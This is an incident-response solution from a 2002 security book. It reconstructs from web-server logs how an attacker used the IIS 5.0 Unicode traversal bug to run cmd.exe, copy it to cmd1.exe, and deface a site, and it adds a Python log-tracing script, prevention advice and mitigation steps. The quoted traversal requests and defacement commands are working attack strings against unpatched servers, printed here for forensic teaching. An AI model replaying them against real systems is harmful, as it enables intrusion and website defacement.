The attacker exploited a known vulnerability in Microsoft IIS Web server version 5.0 to gain access to the victim's web server. They used cmd.exe commands to explore the server and obtain information. The attacker then created a file called cmd1.exe to hide their actions, defaced the website, and installed a web page announcing the hacking before leaving. The incident occurred over 10 minutes and could have been prevented by keeping software updated and restricting user privileges.
Solution 1: The French Connection
by Bill Pennington, Guardent, Inc.
Copyright 2002 by The McGraw-Hill Companies, Inc.
Puzzled from what appeared to be a lack of evidence, the I.T. staff began to research Web defacement attacks and soon discovered that the Web server software they were using, Microsoft’s IIS Web server version 5.0, had a well-known bug that easily allowed attackers to take control of the machine. The bug the attacker exploited, the “Web server file request parsing vulnerability” (better known as the “Unicode Attack”), is detailed in the CVE database under #CVE-2000-0886.
This was an unsettling discovery for the I.T. staff; they realized that this server was on the inside of the network when it was compromised. Therefore, the attacker could now have backdoors to any number of systems inside the network, as well as copies of sensitive data and passwords.
Once the I.T. staff knew the probable method of entry, the well-known Unicode Web server bug, they began to piece together the attack. The bug relies on the ability to execute a system shell, a program called cmd.exe, in order to execute commands on the Web server. The I.T. staff found that if this bug was used, evidence of the attack would be in the Web server log files. They collected all of the log files from the Web server and imported them into a database for analysis. As cmd.exe is not a normally occurring string in Web server log files, they performed a search for that string and found the following:
03/03/2001 4:01 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+c: 200 730 484 31 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
This was the first probe. If successful, the attacker would get a directory listing of the victim computer’s C drive. This is a common, non-invasive technique employed by automated scanning programs to test whether a computer is vulnerable to this bug, without causing any damage.
The next entry was another probe, looking at the directory listing of the D drive, if it existed:
03/03/2001 4:01 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+d: 200 747 484 31 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
The following 13 log file entries show the attacker retrieving various directory listings in order to get a lay of the land, so he could be familiar with the environment. This involved retrieving more directory listings, as well as viewing the victim’s home page.
03/03/2001 4:02 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+e: 502 381 484 47 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:02 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+c: 200 730 484 3
198 Hacker’s Challenge: Test Your Incident Response Skills Using 20 Scenarios
GET /xyzBuzz3.swf - 200 245 324 5141 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:03 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /index.html - 200 228 484 0 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) http://www.victim.com/buzzxyz.html
Once the attacker had a better understanding of the environment, the attack began. First, he renamed an auxiliary Web page to test his capabilities:
03/03/2001 4:05 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+rename+d:\wwwroot\detour.html+detour.html.old 502 355 522 31 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
Next, he created a directory, c:\ArA, to set up shop; copied cmd.exe to his work area; and renamed it cmd1.exe:
03/03/2001 4:05 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+md+c:\ArA 502 355 488 31 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:05 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+c:\winnt\system32\cmd.Exe+c:\ArA\cmd1.exe 502 382 524 125 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
The preceding is the last entry for the cmd.exe search. It becomes clear that the attacker was then using cmd1.exe to do his dirty work. A search for cmd1.exe turned up the entries that follow.
In the first entry for the cmd1.exe search, the attacker built the Web page he wanted to use to replace the real Web page on the server:
03/03/2001 4:07 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../ArA/cmd1.exe /c+echo+"<title>SKI</title><center><H1><b><u>****</u>SCRIPT+KIDZ, INC<u>****</u></h1><br><h2>You,+my+friendz+,are+completely+owned.+I'm+here,+your+security+is+nowhere.<br>Someone+should+check+your+system+security+coz+you+sure+aren't.<br></h2>"+>+c:\ArA\default.htm 502 355 763 31 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
The attacker made a backup of the original Web site:
03/03/2001 4:08 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../ArA/cmd1.exe /c+rename+d:\wwwroot\index.html+index.html.old 502 355 511 16 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
Finally, the attacker copied the defaced Web site over the original Web site and viewed his handiwork:
03/03/2001 4:10 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../ArA/cmd1.exe /c+copy+c:\ArA\default.htm+d:\wwwroot\index.html 502 382 514 31 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:11 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /index.html - 200 276 414 15 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
As you can see from the log files, the attack from start to finish took just ten minutes.
ANSWERS
1. The attacker used the “Web server file request parsing vulnerability,” as detailed in the CVE database under #CVE-2000-0886, to get into the Web server.
2. The attacker made a copy of cmd.exe and renamed it to cmd1.exe, which obfuscated the audit trail, forcing the forensic investigator to follow a new log pattern.
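The cmd.exe search and the pivot to cmd1.exe described in Answer 2 can be automated so that a copied shell does not end the trail. The following is an added example, not code from the book: it contrasts a plain string search with a trace that follows `copy`/`rename` of any tracked executable. The sample entries are constructed from the excerpts above (rejoined onto single lines, Windows path separators written out), and all function names are hypothetical.

```python
import re

UA = "Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)"
CMD = "/scripts/../../winnt/system32/cmd.exe"
CMD1 = "/scripts/../../ArA/cmd1.exe"

def make_line(time, stem, query, tail):
    """Build one log line in the field layout shown in the excerpts."""
    return (f"03/03/2001 {time} chewie.hacker.fr W3SVC1 WWW-2K "
            f"WWW-2K.victim.com 80 GET {stem} {query} {tail} www.victim.com {UA}")

# Constructed sample, modeled on the page's log entries.
SAMPLE_LOG = [
    make_line("4:01", CMD, "/c+dir+c:", "200 730 484 31"),
    make_line("4:03", "/index.html", "-", "200 228 484 0"),
    make_line("4:05", CMD, r"/c+md+c:\ArA", "502 355 488 31"),
    make_line("4:05", CMD,
              r"/c+copy+c:\winnt\system32\cmd.Exe+c:\ArA\cmd1.exe",
              "502 382 524 125"),
    make_line("4:08", CMD1,
              r"/c+rename+d:\wwwroot\index.html+index.html.old",
              "502 355 511 16"),
    make_line("4:10", CMD1,
              r"/c+copy+c:\ArA\default.htm+d:\wwwroot\index.html",
              "502 382 514 31"),
    make_line("4:11", "/index.html", "-", "200 276 414 15"),
]

# date time client service server host port method stem query status n n n ...
ENTRY = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<client>\S+) \S+ \S+ \S+ \d+ "
    r"(?P<method>[A-Z]+) (?P<stem>\S+) (?P<query>.*?) "
    r"(?P<status>\d{3}) \d+ \d+ \d+ ")

def parse(lines):
    """Return a dict per line that matches the expected field layout."""
    return [m.groupdict() for m in map(ENTRY.match, lines) if m]

def basename(path):
    """Last path component, lower-cased; accepts /, \\ and drive colons."""
    return re.split(r"[\\/:]", path)[-1].lower()

def command_words(entry):
    """Words of the shell command passed as '/c+word+word', else []."""
    query = entry["query"]
    return query[3:].split("+") if query.lower().startswith("/c+") else []

def naive_search(lines, needle="cmd.exe"):
    """The first search in the write-up: a plain substring match."""
    return [line for line in lines if needle in line.lower()]

def trace_shell_use(entries, seed="cmd.exe"):
    """Walk entries in time order, following copies of tracked binaries.

    Any request whose executed file is tracked is a hit; if its command
    copies or renames a tracked binary, the new name is tracked too.
    """
    tracked, hits = {seed}, []
    for entry in entries:
        if basename(entry["stem"]) not in tracked:
            continue
        hits.append(entry)
        words = command_words(entry)
        if (len(words) == 3 and words[0].lower() in ("copy", "rename", "ren", "move")
                and basename(words[1]) in tracked):
            tracked.add(basename(words[2]))
    return tracked, hits

def timeline(hits):
    """(time, binary, decoded command) for each hit, for the report."""
    return [(h["time"], basename(h["stem"]), " ".join(command_words(h)))
            for h in hits]

if __name__ == "__main__":
    names, found = trace_shell_use(parse(SAMPLE_LOG))
    print("substring search hits:", len(naive_search(SAMPLE_LOG)))
    print("tracked binaries:", sorted(names))
    for row in timeline(found):
        print(*row)
```

The trace assumes the log is in chronological order, which holds here because a copy has to be requested before the copied binary can be used.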
PREVENTION
Prevention of this attack would have been simple if the software on the Web server had been kept up to date. The patch for the vulnerability the attacker used was released five months prior to the penetration. The patch in this case was in the form of a hot-fix, and at the time of this writing had not been rolled into a full service pack. The administrators had installed all the service packs but had failed to install the additional hot-fixes.
Proper hardening of the Web server could also have prevented this attack. When executing this attack, the attacker is issuing commands as the IUSR_COMPUTERNAME account. This account has no special administrative privileges on the Web server other than the privileges given to EVERYONE. The EVERYONE group, by default, has permission to execute all of the commands located in the %winnt%/system32 directory. On most servers of this kind, administrators are the only users that need to execute these commands from the console. Removing the rights for the EVERYONE group to execute the commands in the %winnt%/system32 directory would have prevented this attack, and most other attacks in the same class.
MITIGATION
To mitigate the damage caused by the penetration, the company decided to completely rebuild the Web server from scratch using the latest software available. While not always necessary, a complete rebuild is the best way to regain strong confidence in a machine’s software after a penetration. For continued security and accountability, the maintenance of the machine was assigned to a single person. In order to gain peace of mind, the company also ordered a security audit from an outside firm to assess any possible deeper penetration of their internal infrastructure. No further damage was found. However, a few weeks later, the company would again find themselves in need of security assistance; that story is detailed in Challenge 2, “The Insider.”
ADDITIONAL RESOURCES
The Honeynet Project's Scan of the Month for February 2001 profiled a very similar attack:
http://project.honeynet.org/scans/scan12/
Microsoft’s security bulletin for the vulnerability, including patch information:
http://www.microsoft.com/technet/security/bulletin/ms00-086.asp
The CVE entry:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0886